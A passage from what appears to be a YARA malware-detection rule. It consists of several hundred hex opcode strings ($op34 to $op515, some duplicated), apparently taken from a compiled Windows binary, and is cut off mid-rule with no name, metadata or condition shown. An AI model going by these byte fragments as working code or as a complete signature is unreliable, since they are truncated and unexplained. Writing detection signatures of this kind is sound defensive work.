{ a1d86044006a0068f0c84300ff7508ff } /* Opcode */ $op34 = { 6c124300c78424000100007c124300c7 } /* Opcode */ $op35 = { 3935046144000f85c6 } /* Opcode */ $op36 = { 59a1d8604400566a00ff75f0ff90d403 } /* Opcode */ 
$op37 = { 542b4400c78424dc } /* Opcode */ $op38 = { a0294400c78424a4 } /* Opcode */ $op39 = { 83c4188945fc837dfc000f8404010000 } /* Opcode */ $op40 = { 8d45e050ff75f4a1d8604400ff90d8 } /* Opcode */ $op41 = { 598d44000250ff751433db43536a008d } /* Opcode */ $op42 = { 58dd4200c78424a8 } /* Opcode */ $op43 = { 53ff76088bf8a1d8604400ff90dc } /* Opcode */ $op44 = { 53ff76088bf8a1d8604400ff90dc } /* Opcode */ $op45 = { 53ff76088bf8a1d8604400ff90dc } /* Opcode */ $op46 = { 54114300c78424b4 } /* Opcode */ $op47 = { 83c420803de2604400007430ff74241c } /* Opcode */ $op48 = { ff7604a1d8604400ff75fc5368b04444 } /* Opcode */ $op49 = { 59a1d8604400566a0053ff90d4030000 } /* Opcode */ $op50 = { 3d230000c0740b3d050000800f85c7 } /* Opcode */ $op51 = { a1d86044008b80d402000083c40c3bc3 } /* Opcode */ $op52 = { 83c40c5f5e5b8be55dc3558bec83ec28 } /* Opcode */ $op53 = { 68fc404300ff75b8a1d8604400ff9020 } /* Opcode */ $op54 = { 8d4744688c4a430050a1d8604400ff90 } /* Opcode */ $op55 = { 50a1d86044005668604d43005653ff90 } /* Opcode */ $op56 = { 5932c0eb628a451057ff750c88068d46 } /* Opcode */ $op57 = { 44e84200c78424d8 } /* Opcode */ $op58 = { 50e74200c78424a8 } /* Opcode */ $op59 = { e0244400c78424ec } /* Opcode */ $op60 = { a1d860440068a0c6430053ff90200300 } /* Opcode */ $op61 = { e0524300c78424d8 } /* Opcode */ $op62 = { 895e10895e14ff901404000085c0742a } /* Opcode */ $op63 = { 83c40c68fc6943008d45c050a1d86044 } /* Opcode */ $op64 = { 83c40c5e5f5bc9c3558bec8b4d088a01 } /* Opcode */ $op65 = { 54a34200c7842494 } /* Opcode */ $op66 = { 8b7c2410a1d860440083c744c70424c8 } /* Opcode */ $op67 = { 595f5e5bc9c3558bec83ec0ca1d86044 } /* Opcode */ $op68 = { e0114300c78424dc } /* Opcode */ $op69 = { 595984c00f85e80b0000a1d860440056 } /* Opcode */ $op70 = { 9c964300c78424a4 } /* Opcode */ $op71 = { c4004300c78424a0 } /* Opcode */ $op72 = { 4003c050ff742414a1d8604400ff9004 } /* Opcode */ $op73 = { 02724100c78110040000fd234100c781 } /* Opcode */ $op74 = { 83c40c8b45fc8b4df489086881 } /* Opcode */ $op75 = { 
598d45f450a1d8604400ff90b8030000 } /* Opcode */ $op76 = { 1a9f4100c781fc03000021224100c781 } /* Opcode */ $op77 = { 83c410eb0233c05b5f5e5dc3558bec83 } /* Opcode */ $op78 = { f0e74200c78424cc } /* Opcode */ $op79 = { 6a085933c0897dcc8d7dd0f3ab8d45f4 } /* Opcode */ $op80 = { 83c4208d44241850a1d8604400ff90b8 } /* Opcode */ $op81 = { 598d44000250536a01568d45ec50ff75 } /* Opcode */ $op82 = { 598d44000250536a01568d45ec50ff75 } /* Opcode */ $op83 = { 83c42ca1d860440057689ca9430068c0 } /* Opcode */ $op84 = { 595f5ec9c3a1d86044006a00ff74240c } /* Opcode */ $op85 = { 59a1d860440056ff90dc020000a1d860 } /* Opcode */ $op86 = { 942b4400c78424e4 } /* Opcode */ $op87 = { ff37a1d8604400ff9098 } /* Opcode */ $op88 = { ff37a1d8604400ff9098 } /* Opcode */ $op89 = { 34124300c78424f4 } /* Opcode */ $op90 = { bca44200c78424f8 } /* Opcode */ $op91 = { a1d860440057ff9098 } /* Opcode */ $op92 = { 85c075078b45cc488945ccff75bcff75 } /* Opcode */ $op93 = { a1d860440068e0cd430053ff90200300 } /* Opcode */ $op94 = { 70e84200c78424e4 } /* Opcode */ $op95 = { 60964300c7842490 } /* Opcode */ $op96 = { d8234400c7842488 } /* Opcode */ $op97 = { 83c40c6844424300ff7588a1d8604400 } /* Opcode */ $op98 = { 83c40c8d45dc50568d45fc50a1d86044 } /* Opcode */ $op99 = { 8d45dc5068000108008d45fc50a1d860 } /* Opcode */ $op100 = { 83c4148945f4ff75f0ff7508a1d86044 } /* Opcode */ $op101 = { 30514300c7842490 } /* Opcode */ $op102 = { ff75fca1d860440056ff90e4030000ff } /* Opcode */ $op103 = { 895c245c895c2460ff90a803000085c0 } /* Opcode */ $op104 = { 1c254400c784240001000028254400c7 } /* Opcode */ $op105 = { 59a1d8604400566a0057ff90d4030000 } /* Opcode */ $op106 = { 7b4300c78424a8060000107b4300c784 } /* Opcode */ $op107 = { 8b4dfc8b0481050410000050a1d86044 } /* Opcode */ $op108 = { 81f9d03f00000f8e96 } /* Opcode */ $op109 = { a1d8604400680446440057ff50405959 } /* Opcode */ $op110 = { e934feffff558bec83ec746a1d8d458c } /* Opcode */ $op111 = { 88974300c78424e4 } /* Opcode */ $op112 = { 102a4400c78424b0 } /* Opcode */ 
$op113 = { 10514300c7842488 } /* Opcode */ $op114 = { 83c40c5f5e5b8be55dc3558bec83ec14 } /* Opcode */ $op115 = { b4dd4200c78424c4 } /* Opcode */ $op116 = { 20974300c78424c4 } /* Opcode */ $op117 = { 8b50245685d20f8ee2 } /* Opcode */ $op118 = { 8ca44200c78424e8 } /* Opcode */ $op119 = { e0284400c7842488 } /* Opcode */ $op120 = { f61c4000c7412cbb584100c781100300 } /* Opcode */ $op121 = { 08114300c78424a0 } /* Opcode */ $op122 = { 83c40c5b5f5ec9c3558bec83ec348365 } /* Opcode */ $op123 = { fca24200c7842484 } /* Opcode */ $op124 = { 4c534300c78424e4 } /* Opcode */ $op125 = { c605c160440001892dcc6044008925c8 } /* Opcode */ $op126 = { c605c160440001892dcc6044008925c8 } /* Opcode */ $op127 = { a0244400c78424d8 } /* Opcode */ $op128 = { e95ffeffffa1d860440053576864a042 } /* Opcode */ $op129 = { 4ca54000c741143c574100c7819c0200 } /* Opcode */ $op130 = { 814300c78424780800000c814300c784 } /* Opcode */ $op131 = { c0964300c78424ac } /* Opcode */ $op132 = { 44244400c78424b8 } /* Opcode */ $op133 = { ff742410a1d860440053ff9090010000 } /* Opcode */ $op134 = { ff742410a1d860440053ff9090010000 } /* Opcode */ $op135 = { 44114300c78424b0 } /* Opcode */ $op136 = { f0234400c7842490 } /* Opcode */ $op137 = { 18114300c78424a4 } /* Opcode */ $op138 = { 744300c78424c004000014744300c784 } /* Opcode */ $op139 = { 83c4188945fc837dfc00752a6880 } /* Opcode */ $op140 = { ccdd4200c78424cc } /* Opcode */ $op141 = { 595b5f5ec9c3558bec535633f633db33 } /* Opcode */ $op142 = { b0de4200c78424fc } /* Opcode */ $op143 = { fc114300c78424e4 } /* Opcode */ $op144 = { fc104300c784249c } /* Opcode */ $op145 = { 8c744000c74108501e4100c781e0 } /* Opcode */ $op146 = { a1d8604400895dfcff50108945f8a1d8 } /* Opcode */ $op147 = { 2c534300c78424e0 } /* Opcode */ $op148 = { 88524300c78424cc } /* Opcode */ $op149 = { b0284400c7842484 } /* Opcode */ $op150 = { 83c41089450885c0751b3945fc0f845d } /* Opcode */ $op151 = { f4524300c78424dc } /* Opcode */ $op152 = { 50de4200c78424ec } /* Opcode */ $op153 = { 
094300c784247002000014094300c784 } /* Opcode */ $op154 = { 8b4e2485c90f84e6 } /* Opcode */ $op155 = { 14254400c78424fc } /* Opcode */ $op156 = { d8104300c7842490 } /* Opcode */ $op157 = { 895c2464895c2468ff90a803000085c0 } /* Opcode */ $op158 = { 895c2464895c2468ff90a803000085c0 } /* Opcode */ $op159 = { 0f825affffff5f5e8be55dc3568b7424 } /* Opcode */ $op160 = { 104000c7819c010000a1a04100c78124 } /* Opcode */ $op161 = { 6c244400c78424c8 } /* Opcode */ $op162 = { 542a4400c78424bc } /* Opcode */ $op163 = { 83c414e965020000f645144175158b45 } /* Opcode */ $op164 = { 3d220000c0740732c0e9c8 } /* Opcode */ $op165 = { b4514300c78424a4 } /* Opcode */ $op166 = { b0964300c78424a8 } /* Opcode */ $op167 = { a1d86044005653ff742420ff90d40300 } /* Opcode */ $op168 = { 593974241c742cff742418a1d8604400 } /* Opcode */ $op169 = { 83c41884c00f849f020000ff75100fb7 } /* Opcode */ $op170 = { 8b4f3a8945f88d440104b96462000066 } /* Opcode */ $op171 = { 6e4300c7842428030000086e4300c784 } /* Opcode */ $op172 = { 894da4ff90380100008d45dc8945bc8d } /* Opcode */ $op173 = { a1d860440068c0304300ff7508ff9044 } /* Opcode */ $op174 = { c8974300c7842400010000d8974300c7 } /* Opcode */ $op175 = { a54200c784240801000010a54200c784 } /* Opcode */ $op176 = { 59ff742420a1d86044005653ff906402 } /* Opcode */ $op177 = { 9ce84200c78424f0 } /* Opcode */ $op178 = { 13a24000898180010000c74150645a40 } /* Opcode */ $op179 = { a1d860440053ff7508ff900402000068 } /* Opcode */ $op180 = { 96144100c781b401000026b14000c781 } /* Opcode */ $op181 = { ff7604a1d8604400ff75fc5368d04444 } /* Opcode */ $op182 = { 83c40cff75bcff75bc0fb705e8604400 } /* Opcode */ $op183 = { ff75f8a1d8604400ff7508ff90900100 } /* Opcode */ $op184 = { 8b463aff750c03c78b40100504100000 } /* Opcode */ $op185 = { 8b413c3bc30f84e0 } /* Opcode */ $op186 = { 6810414300ff75b8a1d8604400ff9020 } /* Opcode */ $op187 = { c0974300c78424fc } /* Opcode */ $op188 = { 6a418d45d05f8945f8c745f020 } /* Opcode */ $op189 = { 80751583780800740fa1d86044005756 } /* Opcode */ 
$op190 = { 80974300c78424e0 } /* Opcode */ $op191 = { 984300c78424100100000c984300c784 } /* Opcode */ $op192 = { 184300c784247c0200000c184300c784 } /* Opcode */ $op193 = { 6898404300ff75b8a1d8604400ff9020 } /* Opcode */ $op194 = { 03c02b45c8590345f883e0fe83f80c75 } /* Opcode */ $op195 = { 8bd8595985db0f848d } /* Opcode */ $op196 = { 83c42085ff750583c8ffeb258b463a8d } /* Opcode */ $op197 = { c8534300c78424f4 } /* Opcode */ $op198 = { a1d8604400687822440056ff90f0 } /* Opcode */ $op199 = { 83c4145e32c05bc9c3558bec83ec24a1 } /* Opcode */ $op200 = { 83c40ceb65e82ac200003d0d0000c0e9 } /* Opcode */ $op201 = { 68682c430050a1d860440057ff902c03 } /* Opcode */ $op202 = { 04e74200c7842494 } /* Opcode */ $op203 = { 83c430ff45f847ff4df00f855affffff } /* Opcode */ $op204 = { a1d860440068eccd430053ff90200300 } /* Opcode */ $op205 = { 8364241800c70500a04200222700008b } /* Opcode */ $op206 = { 8ca34200c78424a0 } /* Opcode */ $op207 = { 685c2b430050a1d860440053ff902c03 } /* Opcode */ $op208 = { 8bf08d45f850a1d8604400ff90b80300 } /* Opcode */ $op209 = { a1d8604400684846440057ff50405959 } /* Opcode */ $op210 = { 598d44245050a1d8604400ff90e00300 } /* Opcode */ $op211 = { ff75148b45fc83c00450ff750ca1d860 } /* Opcode */ $op212 = { 8975b88975bcff90a803000085c00f85 } /* Opcode */ $op213 = { a1d8604400ff742434681069430056ff } /* Opcode */ $op214 = { 83c4148945f8ff75ecff7508a1d86044 } /* Opcode */ $op215 = { 0c254400c78424f8 } /* Opcode */ $op216 = { 80de4200c78424f4 } /* Opcode */ $op217 = { a1d8604400536800080000ff7508ff90 } /* Opcode */ $op218 = { 895de0895de4ff901404000089450c3d } /* Opcode */ $op219 = { 8b4f3a8b55f88365fc008945f40500f0 } /* Opcode */ $op220 = { 154300c78424b401000010154300c784 } /* Opcode */ $op221 = { 1b4400c7842498020000181b4400c784 } /* Opcode */ $op222 = { 83c41084c00f85030c0000a1d8604400 } /* Opcode */ $op223 = { 83c0083bc30f84ab } /* Opcode */ $op224 = { 342c4400c7842400010000442c4400c7 } /* Opcode */ $op225 = { 83c4188d45f050a1d8604400ff90f8 } /* Opcode */ $op226 
= { ff4424148d474450a1d8604400ff9008 } /* Opcode */ $op227 = { a1d860440068b42e43005653ff903002 } /* Opcode */ $op228 = { 9c524300c78424d0 } /* Opcode */ $op229 = { b8a0604400bf34a042002bc78945e40f } /* Opcode */ $op230 = { 5c014300c78424bc } /* Opcode */ $op231 = { 83c41485c0740cc7461002 } /* Opcode */ $op232 = { 837d0c007505e990 } /* Opcode */ $op233 = { 14e74200c7842498 } /* Opcode */ $op234 = { f11c4100c7812c020000b31f4100c781 } /* Opcode */ $op235 = { a1d860440056ff750cff9098 } /* Opcode */ $op236 = { 83c40cff75fcff7508a1d8604400ff90 } /* Opcode */ $op237 = { 83c40cff75fcff7508a1d8604400ff90 } /* Opcode */ $op238 = { 83c40cff75fcff7508a1d8604400ff90 } /* Opcode */ $op239 = { 0c294400c784248c } /* Opcode */ $op240 = { 40974300c78424cc } /* Opcode */ $op241 = { 6e1a4100c78164010000cbc74000c781 } /* Opcode */ $op242 = { d82a4400c78424cc } /* Opcode */ $op243 = { 64244400c78424c4 } /* Opcode */ $op244 = { 83c4188945fc837dfc00746c8b45fc81 } /* Opcode */ $op245 = { 8975d8894ddc8975e48975e8ff901404 } /* Opcode */ $op246 = { 03c02b45cc590345f883e0fe83f80874 } /* Opcode */ $op247 = { ec2b4400c78424f4 } /* Opcode */ $op248 = { 50a1d8604400ff90a402000083c418a1 } /* Opcode */ $op249 = { 6f4300c78424640300000c6f4300c784 } /* Opcode */ $op250 = { 8b750c8b50048b4f3a83c40c8945d089 } /* Opcode */ $op251 = { 7ca44200c78424e0 } /* Opcode */ $op252 = { 8b45fc0fb7400483f8250f85d9 } /* Opcode */ $op253 = { 7ce74200c78424b0 } /* Opcode */ $op254 = { 8975e88975ecff90800300005f8b45fc } /* Opcode */ $op255 = { 8945f08d45d050a1d8604400ff90b803 } /* Opcode */ $op256 = { e4234400c784248c } /* Opcode */ $op257 = { 5c124300c78424fc } /* Opcode */ $op258 = { ff7604a1d8604400ff75fc53688c4444 } /* Opcode */ $op259 = { cce84200c78424fc } /* Opcode */ $op260 = { 83c40c8d5c4302a1d860440057ff9098 } /* Opcode */ $op261 = { f4a34200c78424b4 } /* Opcode */ $op262 = { 83c4148945fcff75f8ff7508a1d86044 } /* Opcode */ $op263 = { 83c4188364240c00c7442438a8124400 } /* Opcode */ $op264 = { 
1641008b151c9042008991180400008b } /* Opcode */ $op265 = { bc2b4400c78424e8 } /* Opcode */ $op266 = { ec104300c7842498 } /* Opcode */ $op267 = { 5768304c440068584c440056ff5024a1 } /* Opcode */ $op268 = { 68e8414300ff75b8a1d8604400ff9020 } /* Opcode */ $op269 = { cca44200c78424fc } /* Opcode */ $op270 = { 50244400c78424bc } /* Opcode */ $op271 = { 8f4300c78424780c0000108f4300c784 } /* Opcode */ $op272 = { 5903c0508d8500feffff5068c0694300 } /* Opcode */ $op273 = { 0faf459c8d7008a1d860440056ff750c } /* Opcode */ $op274 = { ec534300c7842400010000fc534300c7 } /* Opcode */ $op275 = { 56ff75088ad8a1d8604400ff90900100 } /* Opcode */ $op276 = { 663bd8740a46460fb7066685c075d333 } /* Opcode */ $op277 = { 83c4145f5e5b8be55dc3cccccccccccc } /* Opcode */ $op278 = { a1d8604400682c46440057ff50405959 } /* Opcode */ $op279 = { c8014300c78424dc } /* Opcode */ $op280 = { a82a4400c78424c4 } /* Opcode */ $op281 = { a1d86044006814ce430053ff90200300 } /* Opcode */ $op282 = { 402a4400c78424b8 } /* Opcode */ $op283 = { 98e74200c78424b4 } /* Opcode */ $op284 = { 395814eb34a1d860440057ff75f456ff } /* Opcode */ $op285 = { 6c114300c78424bc } /* Opcode */ $op286 = { 57ff751056ff90b8 } /* Opcode */ $op287 = { 684c454300ff7588a1d8604400ff9020 } /* Opcode */ $op288 = { 8b4dfc8d044150ff7514b8001000002b } /* Opcode */ $op289 = { ec244400c78424f0 } /* Opcode */ $op290 = { 60524300c78424c0 } /* Opcode */ $op291 = { a1d860440068002a430057ff90c40300 } /* Opcode */ $op292 = { 48964300c784248c } /* Opcode */ $op293 = { 33f6803dc360440000751aa1d8604400 } /* Opcode */ $op294 = { 54e84200c78424dc } /* Opcode */ $op295 = { a1d860440056536a0468f8904200ff90 } /* Opcode */ $op296 = { 558bec83e4f881ec8c } /* Opcode */ $op297 = { 8b45f483c00450ff7508a1d8604400ff } /* Opcode */ $op298 = { 64de4200c78424f0 } /* Opcode */ $op299 = { c78120040000ba4241008b15b8904200 } /* Opcode */ $op300 = { 8b46048b0dcc6044008988b4 } /* Opcode */ $op301 = { 6860f24300ff75fcff91500300008b0d } /* Opcode */ $op302 = { 
894300c78424b40a00000c894300c784 } /* Opcode */ $op303 = { 684c444300ff7588a1d8604400ff9020 } /* Opcode */ $op304 = { a1d86044005653ff742418ff90d40300 } /* Opcode */ $op305 = { 895dd4897ddc895de0895de4ff901404 } /* Opcode */ $op306 = { 1c244400c78424a8 } /* Opcode */ $op307 = { 6864444300ff7588a1d8604400ff9020 } /* Opcode */ $op308 = { 24014300c78424b4 } /* Opcode */ $op309 = { a1d860440068accd4300ff75f8ff9020 } /* Opcode */ $op310 = { 48004300c7842484 } /* Opcode */ $op311 = { c0dd4200c78424c8 } /* Opcode */ $op312 = { 83c41c803de260440000742cff750ca1 } /* Opcode */ $op313 = { 8b45f88038030f858d } /* Opcode */ $op314 = { 0c124300c78424e8 } /* Opcode */ $op315 = { 18024300c78424f8 } /* Opcode */ $op316 = { 59b001c9c38b4c24048b513a33c033c9 } /* Opcode */ $op317 = { 78974300c78424dc } /* Opcode */ $op318 = { 8c014300c78424cc } /* Opcode */ $op319 = { 5959837df400750cc605c160440000e9 } /* Opcode */ $op320 = { 508d44245450a1d8604400c744245818 } /* Opcode */ $op321 = { 084300c784243002000010084300c784 } /* Opcode */ $op322 = { b4114300c78424d0 } /* Opcode */ $op323 = { 70964300c7842494 } /* Opcode */ $op324 = { d0964300c78424b0 } /* Opcode */ $op325 = { 28124300c78424f0 } /* Opcode */ $op326 = { 895c2464895c2468ff90140400003d22 } /* Opcode */ $op327 = { 5933c03bfb0f94c05f5e5bc9c3cccccc } /* Opcode */ $op328 = { c9c3558bec83ec3c6a0f8d45c450ff75 } /* Opcode */ $op329 = { 5c294400c7842498 } /* Opcode */ $op330 = { ff75106a00ff750ca1d8604400ff90b8 } /* Opcode */ $op331 = { ff75106a00ff750ca1d8604400ff90b8 } /* Opcode */ $op332 = { 59b0015f5e5bc9c3558bec8b450c85c0 } /* Opcode */ $op333 = { 20e74200c784249c } /* Opcode */ $op334 = { 8975dc8975e08975f4ff90800300008b } /* Opcode */ $op335 = { e4dc4200c784248c } /* Opcode */ $op336 = { a1d860440056ff90fc020000a1d86044 } /* Opcode */ $op337 = { a1d860440068f045440057ff50405959 } /* Opcode */ $op338 = { 595f5ec9c3558bec83ec70535733db33 } /* Opcode */ $op339 = { 204400c78424cc03000018204400c784 } /* Opcode */ $op340 = { 
895dcc894dd0895dd8895ddcff901404 } /* Opcode */ $op341 = { 8d7c47028d4702593b450c729f43438b } /* Opcode */ $op342 = { 8a45ff595bc9c3cc558bec83e4f881ec } /* Opcode */ $op343 = { 8b46048b0dc86044008988c4 } /* Opcode */ $op344 = { 598d45ec50a1d8604400ff90f8 } /* Opcode */ $op345 = { 854300c784249809000014854300c784 } /* Opcode */ $op346 = { 8b463a0345fc50a1d8604400ff907802 } /* Opcode */ $op347 = { 8d44242450ff74241ca1d8604400ff90 } /* Opcode */ $op348 = { 30244400c78424b0 } /* Opcode */ $op349 = { 70004300c7842490 } /* Opcode */ $op350 = { 08244400c784249c } /* Opcode */ $op351 = { 1c124300c78424ec } /* Opcode */ $op352 = { 8b45fc8338040f8ee9 } /* Opcode */ $op353 = { f02a4400c78424d0 } /* Opcode */ $op354 = { b0974300c78424f8 } /* Opcode */ $op355 = { 9cdd4200c78424bc } /* Opcode */ $op356 = { a0974300c78424f0 } /* Opcode */ $op357 = { 598d45f4505656568d45cc50683f000f } /* Opcode */ $op358 = { d8dd4200c78424d0 } /* Opcode */ $op359 = { 59ff75f88b7d08a1d860440057ff9090 } /* Opcode */ $op360 = { a1d86044006880fd420057ff90f0 } /* Opcode */ $op361 = { 83c440ff75eca1d8604400576840b043 } /* Opcode */ $op362 = { cc234400c7842484 } /* Opcode */ $op363 = { 595056ff17a1d860440083c40c684853 } /* Opcode */ $op364 = { 83c40c8b45f85e5f5bc9c38b54240456 } /* Opcode */ $op365 = { 3cde4200c78424e8 } /* Opcode */ $op366 = { 60a44200c78424d8 } /* Opcode */ $op367 = { 668b4d0a663bc874c7464666833e000f } /* Opcode */ $op368 = { 5959837dfc0074206880 } /* Opcode */ $op369 = { 668bd80fb70750a1d8604400ff90e8 } /* Opcode */ $op370 = { 668bd80fb70750a1d8604400ff90e8 } /* Opcode */ $op371 = { fcb04000c78100010000a6c84000c781 } /* Opcode */ $op372 = { 44e74200c78424a4 } /* Opcode */ $op373 = { 83c428ff742418a1d86044005653ff90 } /* Opcode */ $op374 = { f8294400c78424ac } /* Opcode */ $op375 = { 78114300c78424c0 } /* Opcode */ $op376 = { 59ff75f8a1d8604400ff7508ff909001 } /* Opcode */ $op377 = { 59ff75f8a1d8604400ff7508ff909001 } /* Opcode */ $op378 = { 59ff442410837c2410040f825affffff } /* Opcode 
*/ $op379 = { 8d45ec50ff75fca1d8604400ff9090 } /* Opcode */ $op380 = { ff45f88d474450a1d8604400ff900804 } /* Opcode */ $op381 = { ff45f88d474450a1d8604400ff900804 } /* Opcode */ $op382 = { 44a44200c78424d0 } /* Opcode */ $op383 = { a1d8604400538b5d08565768feff0000 } /* Opcode */ $op384 = { 08014300c78424ac } /* Opcode */ $op385 = { 8d47fc50a1d860440053ff504c83c424 } /* Opcode */ $op386 = { bce74200c78424c0 } /* Opcode */ $op387 = { 83c410eb098d430881ce } /* Opcode */ $op388 = { ff74241ca1d8604400ff7508ff909001 } /* Opcode */ $op389 = { 8975d88975e48975e8ff901404000053 } /* Opcode */ $op390 = { 8945088b45c083c41085c0740d8b4f3a } /* Opcode */ $op391 = { c4de4200c7842400010000e0de4200c7 } /* Opcode */ $op392 = { 83c41885f6750732c05f5e5bc9c38d46 } /* Opcode */ $op393 = { 44294400c7842494 } /* Opcode */ $op394 = { b0a44200c78424f4 } /* Opcode */ $op395 = { ff90380100008d44242c894424588d84 } /* Opcode */ $op396 = { ac004300c784249c } /* Opcode */ $op397 = { ff7604a1d8604400ff75fc53689c4444 } /* Opcode */ $op398 = { b0104300c7842488 } /* Opcode */ $op399 = { d8594000c78148030000fd2b4100c781 } /* Opcode */ $op400 = { dca44200c7842400010000eca44200c7 } /* Opcode */ $op401 = { 74a44200c78424dc } /* Opcode */ $op402 = { ff901404000085c0a1d86044007412ff } /* Opcode */ $op403 = { 21ab4000c74134e3384100c7417c832b } /* Opcode */ $op404 = { 895c2440895c2444ff90240400005959 } /* Opcode */ $op405 = { a0a44200c78424f0 } /* Opcode */ $op406 = { 80964300c784249c } /* Opcode */ $op407 = { 10244400c78424a0 } /* Opcode */ $op408 = { 72b3ff75f8a1d8604400ff7508ff9090 } /* Opcode */ $op409 = { ace84200c78424f4 } /* Opcode */ $op410 = { 578b7d088d45fe508b450cff34b0a1d8 } /* Opcode */ $op411 = { 764300c784244805000010764300c784 } /* Opcode */ $op412 = { 8975e48975e8ff90140400003d220000 } /* Opcode */ $op413 = { 817c2410102700000f8fd8 } /* Opcode */ $op414 = { 804300c784242008000008804300c784 } /* Opcode */ $op415 = { 6884444300ff7588a1d8604400ff9020 } /* Opcode */ $op416 = { a8dd4200c78424c0 } 
/* Opcode */ $op417 = { 78964300c7842498 } /* Opcode */ $op418 = { 598d44000250566a026a008d45f050ff } /* Opcode */ $op419 = { 83c40c834b0c048b075e5b5fc9c3558b } /* Opcode */ $op420 = { 174400c784249801000014174400c784 } /* Opcode */ $op421 = { e8004300c78424a4 } /* Opcode */ $op422 = { d4114300c78424d8 } /* Opcode */ $op423 = { 56ff75148bf8a1d8604400ff90900100 } /* Opcode */ $op424 = { e0514300c78424ac } /* Opcode */ $op425 = { 08a44200c78424b8 } /* Opcode */ $op426 = { 5959c605c1604400005fc9c3837c2408 } /* Opcode */ $op427 = { 80104300c7842484 } /* Opcode */ $op428 = { 8bf803ff8d471450ff7514a1d8604400 } /* Opcode */ $op429 = { e9adfeffffa1d860440053576850a042 } /* Opcode */ $op430 = { 83c4148bc65ec3558bec83ec7033c056 } /* Opcode */ $op431 = { a1d8604400ff0500a04200536a0356ff } /* Opcode */ $op432 = { 897dc4897dc8ff905001000085c00f85 } /* Opcode */ $op433 = { 5733ff397d7c0f84ea010000a1d86044 } /* Opcode */ $op434 = { 94244400c78424d4 } /* Opcode */ $op435 = { 3d230000c0740b3d050000800f85df } /* Opcode */ $op436 = { 68e4404300ff75b8a1d8604400ff9020 } /* Opcode */ $op437 = { a1d8604400681846440057ff50405959 } /* Opcode */ $op438 = { 5150a1d8604400ff9004020000595981 } /* Opcode */ $op439 = { 598ac3ebaab301ebe8568b7424088b46 } /* Opcode */ $op440 = { 6868454300ff7588a1d8604400ff9020 } /* Opcode */ $op441 = { a1949042008981b0030000a170904200 } /* Opcode */ $op442 = { a8974300c78424f4 } /* Opcode */ $op443 = { 595056ff1783c40ca1d860440056ff90 } /* Opcode */ $op444 = { 8d44240c50a1d8604400ff90f8 } /* Opcode */ $op445 = { 8d44240c50a1d8604400ff90f8 } /* Opcode */ $op446 = { 33db3bc30f84f30100008b40103bc30f } /* Opcode */ $op447 = { 568d441b0250ff7514a1d8604400ff90 } /* Opcode */ $op448 = { 98974300c78424ec } /* Opcode */ $op449 = { 83c430833d0461440005751ba1d86044 } /* Opcode */ $op450 = { 204300c78424d804000010204300c784 } /* Opcode */ $op451 = { 8b48103bcb0f84eb } /* Opcode */ $op452 = { 934300c78424840d000004934300c784 } /* Opcode */ $op453 = { 
593bf37415e943ffffff8d450c50a1d8 } /* Opcode */ $op454 = { 24514300c784248c } /* Opcode */ $op455 = { 1c2c4400c78424fc } /* Opcode */ $op456 = { 83c41885c0740cc7461001 } /* Opcode */ $op457 = { 598bc65f5ec9c3558bec51a1d8604400 } /* Opcode */ $op458 = { 83c40c6a0a83c71057568d45ec50ff75 } /* Opcode */ $op459 = { ff4424108d474450a1d8604400ff9008 } /* Opcode */ $op460 = { 8b45fc8b008d44000250ff7508a1d860 } /* Opcode */ $op461 = { 6a01ff75acff75f46a00ff750ca1d860 } /* Opcode */ $op462 = { 8974247489742478ff901404000085c0 } /* Opcode */ $op463 = { 8974247489742478ff901404000085c0 } /* Opcode */ $op464 = { e4964300c78424b8 } /* Opcode */ $op465 = { 8bd883c41885db0f840c010000a1d860 } /* Opcode */ $op466 = { 3b0508614400751b8b4604ff80b8 } /* Opcode */ $op467 = { 194300c78424c40200000c194300c784 } /* Opcode */ $op468 = { d0514300c78424a8 } /* Opcode */ $op469 = { 48514300c7842494 } /* Opcode */ $op470 = { c8114300c78424d4 } /* Opcode */ $op471 = { ff75f4a1d860440068c843440056ff75 } /* Opcode */ $op472 = { f4514300c78424b0 } /* Opcode */ $op473 = { 50a1d860440051ff9004020000836508 } /* Opcode */ $op474 = { 164400c784244c0100000c164400c784 } /* Opcode */ $op475 = { 83c4188d44242050a1d8604400ff90b8 } /* Opcode */ $op476 = { 54a44200c78424d4 } /* Opcode */ $op477 = { a4e74200c78424b8 } /* Opcode */ $op478 = { a1d860440068e829430057ff90c40300 } /* Opcode */ $op479 = { a1d8604400682012440056ff90f0 } /* Opcode */ $op480 = { a1d860440068202a430057ff90c40300 } /* Opcode */ $op481 = { 6c534300c78424e8 } /* Opcode */ $op482 = { 59a1d860440053ff7508ff9090010000 } /* Opcode */ $op483 = { 59ff442414817c2414af0100000f8276 } /* Opcode */ $op484 = { 2c974300c78424c8 } /* Opcode */ $op485 = { c7430c20020000895df0ff90c0030000 } /* Opcode */ $op486 = { a138904200898160020000a1c0904200 } /* Opcode */ $op487 = { 593bfe7415a1d860440053ff7508ff90 } /* Opcode */ $op488 = { 83c40c5f8ac35ee9e7feffff558bec53 } /* Opcode */ $op489 = { d0dc4200c7842484 } /* Opcode */ $op490 = { 
ff90a8030000f7d81bc0f7d02345fc5f } /* Opcode */ $op491 = { 80004300c7842494 } /* Opcode */ $op492 = { 5150a1d8604400ff9004020000836508 } /* Opcode */ $op493 = { 5933c03bfe5f5e0f94c05bc9c3558bec } /* Opcode */ $op494 = { 3935046144000f859b } /* Opcode */ $op495 = { 83c40c32c0ebdb837c240400750333c0 } /* Opcode */ $op496 = { 68802c4300ff75f057ff902c03000083 } /* Opcode */ $op497 = { 8b4f08988d048504 } /* Opcode */ $op498 = { 98a44200c78424ec } /* Opcode */ $op499 = { ac244400c78424dc } /* Opcode */ $op500 = { 30e74200c78424a0 } /* Opcode */ $op501 = { 895db0895db4ff9014040000bf340000 } /* Opcode */ $op502 = { 5933c0395d0c5f5e0f94c05bc9c3558b } /* Opcode */ $op503 = { 5933c0395d0c5f5e0f94c05bc9c3558b } /* Opcode */ $op504 = { 83c40c5656566a016a0753568d45f450 } /* Opcode */ $op505 = { 83c40c5656566a016a0753568d45f450 } /* Opcode */ $op506 = { 84294400c78424a0 } /* Opcode */ $op507 = { a1d8604400566800100000ff7508ff90 } /* Opcode */ $op508 = { 874300c78424280a00000c874300c784 } /* Opcode */ $op509 = { 59a1d860440056ff903c020000a1d860 } /* Opcode */ $op510 = { 33c0668944242c8d7c242eab66ab6840 } /* Opcode */ $op511 = { 702b4400c78424e0 } /* Opcode */ $op512 = { 598ac3ebaab301ebe8558bec83ec4456 } /* Opcode */ $op513 = { e0104300c7842494 } /* Opcode */ $op514 = { 83c40c5f5e5bc9c3cccc558bec83ec20 } /* Opcode */ $op515 = { 83c41cebc333c08b4c24043b88089242 } /* Opcode */ $op516 = { 